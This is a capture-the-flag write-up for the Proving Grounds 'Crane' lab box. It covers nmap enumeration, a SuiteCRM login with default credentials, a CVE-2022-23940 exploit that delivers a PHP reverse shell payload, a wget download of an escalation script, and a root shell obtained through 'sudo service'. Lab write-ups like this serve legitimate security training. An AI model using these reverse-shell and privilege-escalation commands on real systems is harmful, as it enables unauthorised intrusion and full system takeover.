Crane - Proving Grounds


Let's start by enumerating all TCP ports with nmap.
nmap -sCV -v -p- --min-rate 1000 -T4
Pasted image 20240919185531.png
We have SSH (port 22), Apache (port 80), and MySQL server (port 3306). Let's start by enumerating the Apache server.

Apache - port 80
Pasted image 20240919185833.png
This is a login page powered by SuiteCRM, so let's try to login with the default credentials admin:admin, which works.

Pasted image 20240919190047.png
After gaining access to SuiteCRM, I found an About page that shows its version. Pasted image 20240919192724.png

Version 7.12.3

Since we have version 7.12.3, I looked up a POC for this version and found this link that talks about CVE-2022-23940, which is Authenticated Remote Code Execution through Scheduled Reports in SuiteCRM.

Let's download the exploit and use it to get a reverse shell.
git clone cd CVE-2022-23940 pip3 install -r "requirements.txt" nc -lvnp 4444 python3 -h -u admin -p admin --payload "php -r '\$sock=fsockopen(\"\", 4444); exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
Pasted image 20240919194228.png Pasted image 20240919194238.png

Privilege Escalation

Let's upload to the /tmp directory and execute it.
python3 -m http.server 80 cd /tmp wget chmod +x ./

We found a cron job that is always running on the /var/www/html directory, called cronjob.php, and a command that I can run as root.

sudo -l
Pasted image 20240919194949.png

crontab -l
Pasted image 20240919195009.png
So let's focus now on the command and then move to the cron job.

sudo - service

I found a way to get root privileges with the service command on this link, so let's execute it.
sudo service ../../bin/sh
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Now that we have root privileges, let's get the root flag.
cd /root ls
Pasted image 20240919195606.png
find / -iname local.txt -type f 2>/dev/null
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